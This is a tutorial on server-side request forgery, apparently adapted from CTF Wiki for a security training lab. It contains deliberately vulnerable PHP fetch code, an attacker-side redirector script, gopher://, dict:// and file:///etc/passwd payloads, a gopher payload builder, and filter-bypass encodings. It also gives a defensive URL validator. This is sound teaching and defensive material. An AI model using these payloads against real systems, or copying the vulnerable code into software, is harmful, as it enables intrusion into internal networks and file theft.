1. Introduction to SSRF
SSRF (Server-Side Request Forgery) is a vulnerability in which an attacker makes the server issue a request of the attacker's choosing. SSRF attacks generally target internal systems that cannot be reached directly from the Internet.
The vulnerability usually arises because the server offers a feature that fetches data from other servers by URL and does not filter or restrict the target address.
There are five main kinds of attack an attacker can carry out through SSRF:
1. Port-scan the external network, the intranet the server sits on, or the server itself, and collect the banners of the services found
2. Attack intranet or local applications (for example with an overflow)
3. Fingerprint intranet web applications by requesting their default files
4. Attack web applications on the Internet or the intranet, mainly ones exploitable through GET parameters (for example Struts2, SQLi)
5. Read local files through the file:// protocol
2. Scenarios where SSRF vulnerabilities appear
SSRF can exist anywhere the application can be made to initiate a network request from user-supplied input:
Fetching a resource from a remote server (upload from URL, importing and exporting RSS feeds)
Built-in database functions that fetch remote resources (Oracle, MongoDB, MSSQL, Postgres, CouchDB)
Webmail that collects mail from other mailboxes (POP3, IMAP, SMTP)
File processing, encoding and metadata extraction (FFmpeg, ImageMagick, DOCX, PDF, XML)
3. Common back-end implementation
1. file_get_contents()

<?php
$img = '';
if (isset($_POST['url'])) {
    // Fetches whatever the user-supplied URL points at, through any stream
    // wrapper PHP supports (http://, ftp://, file://, php://, ...).
    $content = file_get_contents($_POST['url']);
    $filename = './images/' . rand() . 'img1.jpg';
    file_put_contents($filename, $content);
    echo $_POST['url'];
    $img = "<img src=\"" . $filename . "\" />";
}
echo $img;
?>

This code uses file_get_contents() to retrieve an image from a user-specified URL, saves it to disk under a random file name and displays it to the user. Nothing checks the scheme or the host of the URL.
2. fsockopen()

<?php
// Opens a raw TCP connection to a user-controlled host and port and sends a
// hand-built HTTP request.
function GetFile($host, $port, $link) {
    $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr (error number $errno)\n";
    } else {
        $out  = "GET $link HTTP/1.1\r\n";
        $out .= "Host: $host\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        $contents = '';
        while (!feof($fp)) {
            $contents .= fgets($fp, 1024);
        }
        fclose($fp);
        return $contents;
    }
}
?>

This code uses fsockopen() to fetch the data (a file or HTML page) at the user-specified host, port and path. fsockopen() opens a plain TCP socket to the server and the script writes raw bytes to it, so the function can reach any TCP service, not just HTTP servers, and the error message it echoes reveals whether the port was open.
3. curl_exec()

<?php
if (isset($_POST['url'])) {
    $link = $_POST['url'];
    $curlobj = curl_init();
    curl_setopt($curlobj, CURLOPT_POST, 0);
    curl_setopt($curlobj, CURLOPT_URL, $link);
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
    // No CURLOPT_PROTOCOLS restriction: libcurl accepts every scheme it was
    // built with (http, https, ftp, file, gopher, dict, ldap, ...).
    $result = curl_exec($curlobj);
    curl_close($curlobj);
    $filename = './curled/' . rand() . '.txt';
    file_put_contents($filename, $result);
    echo $result;
}
?>

This code uses curl to fetch the user-specified URL, stores the response in a file and echoes it back to the user.
4. Conditions that hinder SSRF exploitation
If the target service only accepts TLS (OpenSSL) connections, protocols such as gopher:// and dict:// that push raw bytes cannot complete the handshake, so interactive exploitation is not possible.
If the target service requires authentication (cookies, or a username and password), the attacker usually cannot supply it and exploitation stays incomplete.
If the vulnerable application restricts requests to common HTTP ports, for example 80, 443, 8080 and 8090, other services cannot be reached.
If unnecessary protocols are disabled and only HTTP and HTTPS requests are allowed, the problems caused by file:///, gopher://, ftp:// and similar schemes are prevented.
If error messages are unified, the user cannot infer the port state of the remote server from the error returned.
The last three points are also the defences an application should implement.
5. Using SSRF for port scanning
Most vulnerable applications do not check the state of the target port at all; the attacker infers it from the response: a service banner or page means open, a connection-refused error means closed, and a long delay before an error usually means filtered.
The back-end implementation

<?php
if (isset($_POST['url'])) {
    $link = $_POST['url'];
    $filename = './curled/' . rand() . '.txt';
    $curlobj = curl_init($link);
    $fp = fopen($filename, "w");
    curl_setopt($curlobj, CURLOPT_FILE, $fp);    // write the response body to the file
    curl_setopt($curlobj, CURLOPT_HEADER, 0);    // without the HTTP headers
    curl_exec($curlobj);
    curl_close($curlobj);
    fclose($fp);
    $fp = fopen($filename, "r");
    $size = filesize($filename);
    $result = $size > 0 ? fread($fp, $size) : '';
    fclose($fp);
    echo $result;                                // the response is reflected to the user
}
?>
A front-end form that submits the URL to it:

<html>
<body>
<form name="px" method="post" action="http://127.0.0.1/ss.php">
<input type="text" name="url" value="">
<input type="submit" name="commit" value="submit">
</form>
</body>
</html>

Submitting a URL that points at a non-HTTP port returns that service's banner in the response: curl connects, sends its HTTP request, and the script reflects whatever the service replies.
A 302 redirect can also be used to switch the request to a non-HTTP scheme, provided the application follows redirects (CURLOPT_FOLLOWLOCATION, which the back end above does not set). Note that recent libcurl versions only follow redirects to HTTP(S) and FTP(S) by default (CURLOPT_REDIR_PROTOCOLS), so a redirect to file:// or gopher:// is refused.
Auxiliary redirector script, hosted on an attacker-controlled server

<?php
// The vulnerable application requests this script with ip, port, s (scheme)
// and data in the query string and is redirected to the scheme, host and
// port of the attacker's choosing.
$ip = $_GET['ip'];
$port = $_GET['port'];
$scheme = $_GET['s'];
$data = $_GET['data'];
header("Location: $scheme://$ip:$port/$data");
?>

See the reference "An SSRF vulnerability somewhere at Tencent (a very good exploitation point), with exploitation scripts" for a real-world use of this technique.
6. Exploiting other protocols
dict protocol

dict://fuzz.wuyun.org:8080/helo:dict

curl sends the path after the host to the TCP port as a single command line, replacing each ':' with a space, so this example delivers the text "helo dict" to port 8080. One line per request is enough to talk to simple line-oriented services.
gopher protocol

gopher://fuzz.wuyun.org:8080/gopher

The gopher client drops the leading '/' and the next character (the gopher item type), percent-decodes the rest and writes it to the socket followed by CRLF. Because any byte, including CR and LF, can be percent-encoded, gopher:// can carry a complete multi-line dialogue to an arbitrary TCP service; it is the most flexible of the three.
file protocol

file:///etc/passwd

Reads a local file from the server's file system and returns it in the response.
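As an added example (not code from the original page or from CTF Wiki), the following Python shows how the two remote protocols above map URLs onto the bytes that actually reach the target. gopher_url() wraps an arbitrary TCP payload in a gopher:// URL, and gopher_wire_bytes() / dict_wire_bytes() model what a curl-style client sends for a gopher or dict URL (drop '/' and the item-type character, percent-decode, append CRLF; for dict, ':' becomes a space). The HTTP payload and the host 10.0.0.5 are constructed for the example.

```python
from urllib.parse import quote, unquote_to_bytes


def gopher_url(host, port, payload):
    """Wrap raw TCP bytes in a gopher:// URL.  Every byte is percent-encoded
    (quote with safe='' leaves only [A-Za-z0-9_.~-] bare) so CR, LF, '?', '#'
    and '&' survive URL parsing; the leading '_' is the item-type character the
    client strips, so it never reaches the target."""
    return "gopher://%s:%d/_%s" % (host, port, quote(payload, safe=""))


def _selector(url):
    """Everything after the authority, as the client sees it (query included)."""
    rest = url.split("://", 1)[1]
    slash = rest.find("/")
    return rest[slash:] if slash >= 0 else "/"


def gopher_wire_bytes(url):
    """Bytes a curl-style gopher client writes to the socket: drop the leading
    '/' and the item-type character, percent-decode the rest, append CRLF.
    '/' and '/x' alone yield an empty selector."""
    path = _selector(url)
    selector = path[2:] if len(path) > 2 else ""
    return unquote_to_bytes(selector) + b"\r\n"


def dict_wire_bytes(url):
    """Command line a curl-style dict client sends when the path is not a
    d:/m: lookup: the text after '/' with each ':' turned into a space, plus
    CRLF.  (curl also sends a CLIENT line before it and QUIT after it.)"""
    path = _selector(url)
    return path[1:].replace(":", " ").encode() + b"\r\n"


# Constructed payload: a complete HTTP request with an attacker-chosen Host
# header, which the vulnerable application's own curl call would never allow.
HTTP_PAYLOAD = b"GET /admin HTTP/1.1\r\nHost: 10.0.0.5\r\n\r\n"

if __name__ == "__main__":
    url = gopher_url("10.0.0.5", 80, HTTP_PAYLOAD)
    print(url)
    # The page's own example: the 'g' of "/gopher" is consumed as the item type.
    print(gopher_wire_bytes("gopher://fuzz.wuyun.org:8080/gopher"))
    print(dict_wire_bytes("dict://fuzz.wuyun.org:8080/helo:dict"))
```

Running it shows why the page's gopher example is only a connectivity probe: of the path "/gopher" the client sends just "opher" plus CRLF, because the "g" is eaten as the item type. The dict example sends "helo dict". Percent-encoding every payload byte, rather than only the unsafe ones, is deliberate: it keeps '?', '#' and '&' from being interpreted by whatever URL parser sits between the attacker and the socket.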
7. Bypass techniques
1. Alternative IP address encodings, for example for 192.168.0.1:
dotted octal: 0300.0250.0.1
dotted hexadecimal: 0xC0.0xA8.0.1
decimal integer: 3232235521
hexadecimal integer: 0xC0A80001
There is also a shortened dotted form: inet_aton() fills the omitted middle octets with zeros, so 10.0.0.1 can be written as 10.1.
2. Abusing URL parsing. The back end may parse the URL and filter on the host it extracts; if its parser and the HTTP client disagree about which part of the URL is the host, the filter is bypassed. For example:
Both http://<anything>@192.168.0.1/ and http://192.168.0.1/ fetch 192.168.0.1, because the text before '@' is the userinfo, not the host (the domain used before '@' in the original is a placeholder here).
Wildcard DNS services resolve a name to whatever IP is embedded in it: http://127.0.0.1.xip.io/ => http://127.0.0.1/ (xip.io itself is no longer operated; nip.io and sslip.io offer the same service).
Short URLs: http://dwz.cn/11SMa => http://127.0.0.1
Ideographic full stops instead of periods: 127。0。0。1 => 127.0.0.1
Enclosed alphanumerics: ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ => example.com. Any character from the Unicode Enclosed Alphanumerics block (U+2460 to U+24FF: ① to ⑳, ⑴ to ⒇, ⒈ to ⒛, ⒜ to ⒵, Ⓐ to Ⓩ, ⓐ to ⓩ, ⓪ to ⓿) is folded to its plain ASCII letter or digit by clients that apply IDNA/NFKC normalisation to host names.
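As an added example (not code from the original page or from CTF Wiki), here is what a back end has to do to make the restrictions of section 4 (scheme and port allow-list, no internal destinations) hold against the encodings of section 7: canonicalise the host before comparing it with anything. parse_legacy_ipv4() decodes the same loose dotted, octal, hexadecimal, integer and shortened forms that inet_aton() and the system resolver accept; normalize_host() applies NFKC and folds the non-ASCII full stops; target_ip() works on the host urlsplit() extracts, so the userinfo before '@' is ignored. The DNS table FAKE_DNS and the address it returns for example.com are constructed so the example runs offline; the allowed port set is the one listed in section 4.

```python
import ipaddress
import re
import unicodedata
from urllib.parse import urlsplit

# One dotted part of a legacy IPv4 literal: 0x hex, leading-0 octal, or decimal.
_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")

# IDNA/UTS#46 label separators that browsers and resolvers treat as '.'.
_DOT_ALIASES = {"\u3002": ".", "\uff0e": ".", "\uff61": "."}

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443, 8080, 8090}

# Constructed stand-in for DNS so the example runs offline (not real records).
FAKE_DNS = {
    "127.0.0.1.xip.io": "127.0.0.1",   # wildcard-DNS style name
    "example.com": "93.184.216.34",     # constructed entry for a public host
}


def parse_legacy_ipv4(text):
    """Decode the loose forms accepted by inet_aton(): 1 to 4 parts, each
    decimal, octal (leading 0) or hex (0x); the last part fills all remaining
    bytes.  Returns the canonical dotted quad, or None if not an IPv4 literal."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.match(p) for p in parts):
        return None
    values = []
    for p in parts:
        if p[:2].lower() == "0x":
            values.append(int(p[2:], 16))
        elif len(p) > 1 and p[0] == "0":
            values.append(int(p, 8))
        else:
            values.append(int(p, 10))
    *head, tail = values
    tail_bytes = 5 - len(values)           # bytes covered by the last part
    if any(v > 0xFF for v in head) or tail >= 1 << (8 * tail_bytes):
        return None
    number = 0
    for v in head:
        number = (number << 8) | v
    number = (number << (8 * tail_bytes)) | tail
    return str(ipaddress.IPv4Address(number))


def normalize_host(host):
    """Fold Unicode look-alikes (enclosed alphanumerics, full-width digits)
    and non-ASCII full stops into the plain ASCII host the client will use."""
    host = unicodedata.normalize("NFKC", host)
    host = "".join(_DOT_ALIASES.get(ch, ch) for ch in host)
    return host.lower().rstrip(".")


def target_ip(url, resolve=None):
    """IPv4 address the HTTP client would actually connect to, or None.
    `resolve` is a name -> IP callable: FAKE_DNS.get here, a real resolver
    in production."""
    host = urlsplit(url).hostname      # drops the userinfo before '@' and the port
    if not host:
        return None
    host = normalize_host(host)
    ip = parse_legacy_ipv4(host)
    if ip is None and resolve is not None:
        ip = resolve(host)
    return ip


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_reserved or addr.is_unspecified or addr.is_multicast)


def is_allowed(url, resolve=None):
    """Scheme, port and destination checks, applied after canonicalisation."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False
    port = parts.port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False
    ip = target_ip(url, resolve)
    if ip is None:                     # unresolvable or unparsable: fail closed
        return False
    return not is_internal(ip)
```

Two things the check alone does not cover: the answer the resolver gives at check time must be the one the client connects to (resolve once, connect to that IP and send the Host header yourself, otherwise DNS rebinding defeats the check), and every redirect target must go through is_allowed() again before it is followed. Note also that ipaddress.ip_address() rejects the octal and shortened forms outright, which is exactly why a filter built directly on it and a client built on inet_aton() disagree about the destination.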
8. Impact
Port-scanning the external network, the intranet the server sits on, or the server itself, and collecting the banners of the services found.
Attacking intranet or local applications (for example with an overflow).
Fingerprinting intranet web applications by requesting their default files.
Attacking web applications on the Internet or the intranet, mainly ones exploitable through GET parameters (for example Struts2, SQLi).
Reading local files through the file:// protocol.
9. References
Build Your SSRF EXP Autowork
An SSRF vulnerability somewhere at Tencent (a very good exploitation point), with exploitation scripts
From information leakage to SSRF to command execution on a Bilibili sub-site
10. Notes
Related practice labs
SSRF vulnerability analysis and practice
SSRF Vulnerability Advanced Practice: attacking intranet Redis
SSRF Vulnerability Advanced Practice: exploiting Struts2 S2-032
About Hetian Network Security Laboratory
Hetian Network Security Laboratory (www.hetianlab.com) is a Chinese online education platform for hands-on network security training.
It offers online practice in real environments; the labs cover system security, software security, network security, web security, mobile security, CTF, forensic analysis, penetration testing, security awareness education and more.
Attribution
This article is adapted from "SSRF Server-Side Request Forgery" on CTF Wiki.
The entire content of this article is provided under the terms of the CC BY-NC-SA 4.0 licence; additional terms may apply.